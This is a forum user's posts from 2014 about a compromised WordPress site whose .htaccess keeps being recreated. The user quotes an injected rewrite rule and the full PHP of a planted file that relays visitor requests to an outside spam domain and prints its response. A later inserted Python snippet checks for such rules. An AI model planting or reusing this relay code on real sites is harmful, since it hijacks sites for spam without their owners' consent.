Messages - Barret Wallace

1
Web Oriented Coding / Re: .htaccess keeps re-appearing
« on: September 24, 2014, 09:05:41 pm »
Thank you!


@Factionwars: I already deleted a file that included an eval(...) expression and obviously was malicious. Several WP-Plugins indicate that there is most probably no security risk anymore. Although you never know... ;-)


@proxx: audit would be great. However, I can only use ssh as a regular user and cannot install or use this tool.


However, I just saw that the .htaccess file is recreated permanently. When I look at the timestamp, it shows always the current server time. Are there any logs that I can have a look at that might point me to the right direction?

2
Web Oriented Coding / Re: .htaccess keeps re-appearing
« on: September 23, 2014, 08:50:50 pm »
Hi and thank you very much for your thoughts.


It is a Linux Server (Kernel 2.6.x), which I can use through cPanel, FTP and ssh. The software that is infected is WordPress. It was hijacked probably already months ago. As far as I can see, the hack "only" adds spam links (hidden by css) to the bottom of my page. Perhaps, I'll have no choice but to re-install everything from scratch. However, I also want to understand and learn what happens and I also have to wait a couple of weeks before I can reinstall everything. Thus, I would very much appreciate if there is a chance to clean the mess as well as possible now.


This is what the 444 .htaccess inside the Wordpress root directory looks like:

Code: [Select]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)\.html$ /wp-includes/wp-post.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

I can't delete this file. The wp-post.php is not a file originally created by WordPress. The content looks like:


Code: [Select]
<?php
set_time_limit(0);
error_reporting(0);
// Fetch a remote URL using whichever HTTP mechanism the host allows
function getContent($url){
$output='';
if(function_exists('curl_init')) {
$time_out = 30;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out);
$output = curl_exec($ch);
curl_close($ch);
}
elseif(function_exists('file_get_contents')) {
$output = file_get_contents($url);
}else{
$info = parse_url($url);
$fp = fsockopen($info["host"], 80, $errno, $errstr, 3) or exit($errstr."--->".$errno);
$head = "GET ".$info['path']."?".$info["query"]." HTTP/1.0\r\n";
$head .= "Host: ".$info['host']."\r\n";
$head .= "\r\n";
$write = fputs($fp, $head);
while (!feof($fp))
{
  $output .= fgets($fp);
}
}
return $output;
}
// Relay the requested URI and this site's domain to the remote server and echo its response
$domain = ereg_replace("^www\.", "", $_SERVER['SERVER_NAME']);
echo getContent('http://www.jameslebronbasketballshoes.com/file.aspx?f='.$_SERVER['REQUEST_URI'].'&d='.$domain);
?>

I can't delete this file either.

Any ideas how to find out which script or file or else re-creates the .htaccess file every time I delete it?
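
An added example, not part of the original post: one way to spot the injected rule is to compare everything between the `# BEGIN WordPress` / `# END WordPress` markers with the block a stock single-site WordPress install writes, then list the rewrite targets that need inspecting on disk. `STOCK` assumes an install at the web root (`RewriteBase /`), and the function names are hypothetical.

```python
import re

# Directives a stock single-site WordPress install writes between its markers
# (assumption: installed at the web root, so RewriteBase is "/").
STOCK = {
    "<IfModule mod_rewrite.c>",
    "RewriteEngine On",
    "RewriteBase /",
    r"RewriteRule ^index\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule . /index.php [L]",
    "</IfModule>",
}
RULE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[(.*)\])?$", re.I)

# The .htaccess quoted in the post, embedded so the example runs offline.
SAMPLE = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteRule ^(.*)\.html$ /wp-includes/wp-post.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

def injected_directives(text):
    """Return directives inside the WordPress block that a stock install lacks."""
    found, inside = [], False
    for raw in text.splitlines():
        line = " ".join(raw.split())  # normalise indentation and spacing
        if line.startswith("# BEGIN WordPress"):
            inside = True
        elif line.startswith("# END WordPress"):
            inside = False
        elif inside and line and line not in STOCK:
            found.append(line)
    return found

def rewrite_targets(directives):
    """Return the substitution targets of injected RewriteRules ('-' means none)."""
    matches = (RULE.match(d) for d in directives)
    return [m.group(2) for m in matches if m and m.group(2) != "-"]

if __name__ == "__main__":
    print(injected_directives(SAMPLE), rewrite_targets(injected_directives(SAMPLE)))
```

Run against the file from the post, it reports the single `.html` rule and `/wp-includes/wp-post.php` as the file to examine.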

3
Web Oriented Coding / .htaccess keeps re-appearing
« on: September 22, 2014, 06:57:37 pm »
Hi,


I guess, my web site is a little bit hacked... I think, I replaced most of the malicious files, but the .htaccess file has certain (spam-oriented) rewrite rules. When I try to delete it, it doesn't work. The file has 444 permissions and every time I delete the file, it is re-created immediately. Unfortunately, I don't know by whom. Has anybody a clue how to proceed in order to get rid of it?
